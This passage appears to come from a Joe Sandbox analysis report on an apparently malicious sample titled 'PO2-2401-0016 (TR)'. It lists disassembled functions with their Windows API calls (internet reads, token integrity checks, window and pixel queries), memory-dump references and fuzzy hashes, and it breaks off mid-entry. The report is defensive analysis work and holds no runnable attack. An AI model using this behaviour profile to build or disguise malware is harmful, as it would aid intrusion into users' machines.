                                • Instruction Fuzzy Hash: 7731B970904381AEEB35CBB4AC4DFB677A4AB35308F04856DE472865A0D3F5D686CB51
                                Function 001CCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCF38
                                • InternetReadFile.WININET(?,00000000,?,?), ref: 001CCF6F
                                • GetLastError.KERNEL32(?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFB4
                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFC8
                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                • String ID:
                                • API String ID: 3191363074-0
                                • Opcode ID: b909f00b97fdf44572fb6a7b8daa972c480e1a8b76008ccbc9f76b559bc1aa10
                                • Instruction ID: 4c06c71d1c9792f0457488f15fef66c0b22df8b005b0fb17a822d8f05329ce31
                                • Opcode Fuzzy Hash: b909f00b97fdf44572fb6a7b8daa972c480e1a8b76008ccbc9f76b559bc1aa10
                                • Instruction Fuzzy Hash: 5C314B71900205AFDB24DFA5D884EAEBBF9EB24350B10442EF51AD6540DB30EE41DBA0
                                Function 001B1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 001B1915
                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 001B19C1
                                • Sleep.KERNEL32(00000000,?,?,?), ref: 001B19C9
                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 001B19DA
                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001B19E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePostSleep$RectWindow
                                • String ID:
                                • API String ID: 3382505437-0
                                • Opcode ID: dac19da16d6f1bf9f99bf966ab993ad51d96ebde6e24deb9460be94268ee72a9
                                • Instruction ID: 00f8b5812e3b08875a98a42a7f0d70d1515674c032fa034aed988536738ffd84
                                • Opcode Fuzzy Hash: dac19da16d6f1bf9f99bf966ab993ad51d96ebde6e24deb9460be94268ee72a9
                                • Instruction Fuzzy Hash: 6A31C072A00259FFCB04CFA8CDA9ADE3BB5EB05319F514229F921EB2D1C7709944CB90
                                Function 001E5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001E5745
                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 001E579D
                                • _wcslen.LIBCMT ref: 001E57AF
                                • _wcslen.LIBCMT ref: 001E57BA
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001E5816
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$_wcslen
                                • String ID:
                                • API String ID: 763830540-0
                                • Opcode ID: 483fbff1a91d98e8a25715c84f16fb7f69900c74e6250a69d474c852f9994732
                                • Instruction ID: eb62fbbe09eb0fbf4546a175201c600512fb0a6b3e4760f3f22ee9e8a4d0a58c
                                • Opcode Fuzzy Hash: 483fbff1a91d98e8a25715c84f16fb7f69900c74e6250a69d474c852f9994732
                                • Instruction Fuzzy Hash: 8021A531D04A989ADB208FA1CC84AEE7BB9FF14328F148216E919EB1C1E7708985CF50
                                Function 001D0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(00000000), ref: 001D0951
                                • GetForegroundWindow.USER32 ref: 001D0968
                                • GetDC.USER32(00000000), ref: 001D09A4
                                • GetPixel.GDI32(00000000,?,00000003), ref: 001D09B0
                                • ReleaseDC.USER32(00000000,00000003), ref: 001D09E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ForegroundPixelRelease
                                • String ID:
                                • API String ID: 4156661090-0
                                • Opcode ID: 5e5597632bce9635dd8546a505fe3e8fab7f1da0714272e41b1629c03a08f3ef
                                • Instruction ID: a79f7cd2c16cf434429be110859946a4f6b2228885591f96f115cf7f3228d353
                                • Opcode Fuzzy Hash: 5e5597632bce9635dd8546a505fe3e8fab7f1da0714272e41b1629c03a08f3ef
                                • Instruction Fuzzy Hash: 7A216F35600204AFD704EFA9DC94AAEBBE5FF58701F04846DE85ADB752DB70AC45CB90
                                Function 0018CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0018CDC6
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0018CDE9
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0018CE0F
                                • _free.LIBCMT ref: 0018CE22
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0018CE31
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: f4b2845e8363dc79ed137dc846a2b53a77e1cc5a9c44b2e77522147284e53798
                                • Instruction ID: e958602a2ae63b4e5817c00d4e1eae09f62383bd76fd0888ea4d19a03a944981
                                • Opcode Fuzzy Hash: f4b2845e8363dc79ed137dc846a2b53a77e1cc5a9c44b2e77522147284e53798
                                • Instruction Fuzzy Hash: D40184726016557F232136BA6C88D7F6E6DEFC6BA13154129F905C7201EB718F028BF0
                                Function 00169639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                • SelectObject.GDI32(?,00000000), ref: 001696A2
                                • BeginPath.GDI32(?), ref: 001696B9
                                • SelectObject.GDI32(?,00000000), ref: 001696E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: 5169f6e42dfb5c5c2bc93393e032814e41d3b6068bffa3a63fa961d53a09697d
                                • Instruction ID: e44c796555f198626d25065c5465cccc452d12356bef9d7c3f5710b95ac31fdf
                                • Opcode Fuzzy Hash: 5169f6e42dfb5c5c2bc93393e032814e41d3b6068bffa3a63fa961d53a09697d
                                • Instruction Fuzzy Hash: F9214CB0802385EBDB219FA4EC58BAD3BA9BF61755F10061AF410A61B0D37099F3CF94
                                Function 001B5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: 3a57c3e1db3537d09648e8c684d3ce9d96f5964333bab13e0d5b8ee069afe72a
                                • Instruction ID: 3e744240950d7f23664eb20e4685a98fd9e3055b593b1d9a5091baeb7cab6983
                                • Opcode Fuzzy Hash: 3a57c3e1db3537d09648e8c684d3ce9d96f5964333bab13e0d5b8ee069afe72a
                                • Instruction Fuzzy Hash: 0F017971741A05BBE30857159D82FFF736FAB713A8FA44025FD089B641FB61EE1282A1
                                Function 00182DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6), ref: 00182DFD
                                • _free.LIBCMT ref: 00182E32
                                • _free.LIBCMT ref: 00182E59
                                • SetLastError.KERNEL32(00000000,00151129), ref: 00182E66
                                • SetLastError.KERNEL32(00000000,00151129), ref: 00182E6F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: bf65d64b554494f2a9de40a0d988fbf98899517144fcb6ad5a623077a1ae846c
                                • Instruction ID: b74181cce1624f5f65229d36570dc6011b31d137c78fe4e5194cb2eb77382830
                                • Opcode Fuzzy Hash: bf65d64b554494f2a9de40a0d988fbf98899517144fcb6ad5a623077a1ae846c
                                • Instruction Fuzzy Hash: D3012836645A007BC62377747C89D6F265EABE17B5B364028F825A32D2EF348F014F64
                                Function 001B000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                Download Yara Rule
                                APIs
                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?,?,001B035E), ref: 001B002B
                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0046
                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0054
                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?), ref: 001B0064
                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0070
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                • String ID:
                                • API String ID: 3897988419-0
                                • Opcode ID: c10d0cd7b368cf0e37a33ae62399fbd4a67cc09aadead78c4f029ad64945c1b7
                                • Instruction ID: 5e82318942e018037074c7c26c7a91e17c5eb2299172f563645bd6342c1c84dc
                                • Opcode Fuzzy Hash: c10d0cd7b368cf0e37a33ae62399fbd4a67cc09aadead78c4f029ad64945c1b7
                                • Instruction Fuzzy Hash: CA018F72600204BFDB125FA8DC44FEF7AADEB48791F144128F905D6210D771DD818BA0
                                Function 001BE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?), ref: 001BE997
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 001BE9A5
                                • Sleep.KERNEL32(00000000), ref: 001BE9AD
                                • QueryPerformanceCounter.KERNEL32(?), ref: 001BE9B7
                                • Sleep.KERNEL32 ref: 001BE9F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 6a1925cb3ca0607944f05eadc184df51a5ffd1a0c906d7128ed5216db8e2cc24
                                • Instruction ID: fa44b8d00f33f95147c47a4bbdbc8ef91c4de7321d3296911f926bbd54e334ef
                                • Opcode Fuzzy Hash: 6a1925cb3ca0607944f05eadc184df51a5ffd1a0c906d7128ed5216db8e2cc24
                                • Instruction Fuzzy Hash: 99012531C01629DBCF00AFE5DC99AEDBBB8FF09705F010556E902B6241CB30A699CBA1
                                Function 001B10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 842720411-0
                                • Opcode ID: f76494255bdeda662568a3f15695662905a798cffad94144f2a9fcc165262753
                                • Instruction ID: 465eebd2543eb461139ff385fef29d4f5b5d0c48c1df7439c1ab3acb9955c346
                                • Opcode Fuzzy Hash: f76494255bdeda662568a3f15695662905a798cffad94144f2a9fcc165262753
                                • Instruction Fuzzy Hash: FB018179500205BFDB114FA8DC89EAE3F6EEF86360B150418FA41C7350DB31DC418BA0
                                Function 001B0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001B0FCA
                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001B0FD6
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001B0FE5
                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001B0FEC
                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001B1002
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: f2ce5e3445e4cb6bb67e75d652101ae0854e26ba7e2259fe31d57c8f6447a040
                                • Instruction ID: 599e9936f87d08dfc6ea5be66b7b6e55289394f4995e8dd25743e20eae4b6c2e
                                • Opcode Fuzzy Hash: f2ce5e3445e4cb6bb67e75d652101ae0854e26ba7e2259fe31d57c8f6447a040
                                • Instruction Fuzzy Hash: C1F04939200345FBDB215FA49C8DF9A3BADEF8A762F614415FE45CA651CB70DC818BA0
                                Function 001B1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001B102A
                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001B1036
                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1045
                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001B104C
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1062
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: 56869306bf8377c448402fe25ccb47275ff7832e29634f1e5da809ec873a3120
                                • Instruction ID: cdb0f7641aa69fefaf5f8958020618415bc2e9da5b5d7ae4a01c25d16c6d56bd
                                • Opcode Fuzzy Hash: 56869306bf8377c448402fe25ccb47275ff7832e29634f1e5da809ec873a3120
                                • Instruction Fuzzy Hash: 61F04F39100341FBD7215FA4EC99F9A3B6DEF8A761F610414FD45CA650CB70D8818AA0
                                Function 001C030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0324
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0331
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C033E
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C034B
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0358
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0365
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: fdc14175c91c69d7c468d612b0cadb219369c9fbd1fec103cba9190b497c596e
                                • Instruction ID: a38da16d7f258c06d9e74c4272991f74404e954a857839e5a82c99d01665fd7a
                                • Opcode Fuzzy Hash: fdc14175c91c69d7c468d612b0cadb219369c9fbd1fec103cba9190b497c596e
                                • Instruction Fuzzy Hash: FB01EE72800B81CFCB32AF66D880802FBF9BF603153059A3FD19252931C3B1A989CF80
                                Function 0018D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 0018D752
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018D764
                                • _free.LIBCMT ref: 0018D776
                                • _free.LIBCMT ref: 0018D788
                                • _free.LIBCMT ref: 0018D79A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4983f00e7595060a01d7321fc2dc210ae95114eae5681df88db95a08c6e502d4
                                • Instruction ID: c65d8b95ff346c1a461134dce79e44d5ca6767d63c1cfe7225bc4c62264a7d1c
                                • Opcode Fuzzy Hash: 4983f00e7595060a01d7321fc2dc210ae95114eae5681df88db95a08c6e502d4
                                • Instruction Fuzzy Hash: 94F03632944314AB8622FB68F9C6C5677EDBB547187A64C05F048D7541CB34FD808F64
                                Function 001B5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 001B5C58
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 001B5C6F
                                • MessageBeep.USER32(00000000), ref: 001B5C87
                                • KillTimer.USER32(?,0000040A), ref: 001B5CA3
                                • EndDialog.USER32(?,00000001), ref: 001B5CBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
